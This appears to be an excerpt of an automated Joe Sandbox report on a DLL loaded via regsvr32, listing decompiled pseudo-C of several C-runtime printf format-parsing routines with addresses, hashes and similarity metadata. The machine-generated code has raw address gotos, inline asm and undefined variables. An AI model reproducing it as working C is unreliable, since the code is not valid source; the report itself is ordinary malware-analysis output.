                                                      • Instruction Fuzzy Hash: 35910A62A0C6C18AE7F08B55E88077EB3E1F385756F600026E6CD87AA4DB7ED855DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BCFA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t191 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t192 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t171 + _t192 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                                      0x7fef9d3bd02
                                                      0x7fef9d3bd11
                                                      0x7fef9d3bd1b
                                                      0x7fef9d3bd25
                                                      0x7fef9d3bd2f
                                                      0x7fef9d3bd39
                                                      0x7fef9d3bd3b
                                                      0x7fef9d3bd44
                                                      0x7fef9d3bd48
                                                      0x7fef9d3bd51
                                                      0x7fef9d3bd55
                                                      0x7fef9d3bd5e
                                                      0x7fef9d3bd62
                                                      0x7fef9d3bd68
                                                      0x7fef9d3bd70
                                                      0x7fef9d3bd79
                                                      0x7fef9d3bd8d
                                                      0x7fef9d3bd8f
                                                      0x7fef9d3bd9c
                                                      0x7fef9d3bda5
                                                      0x7fef9d3bdae
                                                      0x7fef9d3bdb8
                                                      0x7fef9d3bdbc
                                                      0x7fef9d3bdd1
                                                      0x7fef9d3bdda
                                                      0x7fef9d3bdf2
                                                      0x7fef9d3bdf4
                                                      0x7fef9d3be01
                                                      0x7fef9d3be0a
                                                      0x7fef9d3be0c
                                                      0x7fef9d3be14
                                                      0x7fef9d3be29
                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 530996419-4087627031
                                                      • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                      • Instruction ID: f671f2f81670ff54d1d55a26610e2e3881df7bf560f190d6bc7d2e9ce8938301
                                                      • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                      • Instruction Fuzzy Hash: 8B517E72A0D6C28AF3F18B64E855BBEB7E4F384345F600126D2C9869A9DB7DE540CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DCA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t191 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t192 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t171 + _t192 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                                      0x7fef9d3dcb0
                                                      0x7fef9d3dcbf
                                                      0x7fef9d3dcc9
                                                      0x7fef9d3dcd3
                                                      0x7fef9d3dcdd
                                                      0x7fef9d3dce7
                                                      0x7fef9d3dce9
                                                      0x7fef9d3dcf2
                                                      0x7fef9d3dcf6
                                                      0x7fef9d3dcff
                                                      0x7fef9d3dd03
                                                      0x7fef9d3dd0c
                                                      0x7fef9d3dd10
                                                      0x7fef9d3dd16
                                                      0x7fef9d3dd1e
                                                      0x7fef9d3dd27
                                                      0x7fef9d3dd3b
                                                      0x7fef9d3dd3d
                                                      0x7fef9d3dd4a
                                                      0x7fef9d3dd53
                                                      0x7fef9d3dd5c
                                                      0x7fef9d3dd66
                                                      0x7fef9d3dd6a
                                                      0x7fef9d3dd7f
                                                      0x7fef9d3dd88
                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 530996419-1247675978
                                                      • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                      • Instruction ID: decea58dbdbd6501be5c610137b77bb3c0dc28cbce38a3a9de9bceb14a18b164
                                                      • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                      • Instruction Fuzzy Hash: 1F510CB2A0C6C68AE7B09B64F8407BEB7E0F385346F600125D6C9869A8D77DE444DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BD82 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 26%
                                                      			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t139;
				char* _t159;
				char* _t160;

				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t159 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t160 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t139 + _t160 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                                      0x7fef9d3bd8d
                                                      0x7fef9d3bd8f
                                                      0x7fef9d3bd9c
                                                      0x7fef9d3bda5
                                                      0x7fef9d3bdae
                                                      0x7fef9d3bdb8
                                                      0x7fef9d3bdbc
                                                      0x7fef9d3bdd1
                                                      0x7fef9d3bdda
                                                      0x7fef9d3bdf2
                                                      0x7fef9d3bdf4
                                                      0x7fef9d3be01
                                                      0x7fef9d3be0a
                                                      0x7fef9d3be0c
                                                      0x7fef9d3be14
                                                      0x7fef9d3be29
                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-192189897
                                                      • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                      • Instruction ID: 7af9cebcf9cdbe51cb5c05a1613d0acac690945035c75598d7829d850d960732
                                                      • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                      • Instruction Fuzzy Hash: 40515E72A0D6C68AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DD30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 26%
                                                      			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t139;
				char* _t159;
				char* _t160;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t159 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t160 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t139 + _t160 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                                      0x7fef9d3dd3b
                                                      0x7fef9d3dd3d
                                                      0x7fef9d3dd4a
                                                      0x7fef9d3dd53
                                                      0x7fef9d3dd5c
                                                      0x7fef9d3dd66
                                                      0x7fef9d3dd6a
                                                      0x7fef9d3dd7f
                                                      0x7fef9d3dd88
                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-734865713
                                                      • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                      • Instruction ID: f5bf503dfe25a3916c99f1d9d67644448d63221e22ccd8ab12d6653ca93a9968
                                                      • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                      • Instruction Fuzzy Hash: 0E510DB2A0C6C28AE7F09B64E8407BEB7E4F394345F600126E6C9879A9DB7DD445CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BDE7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t113;
				char* _t133;

				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t133 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t113 + _t133 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
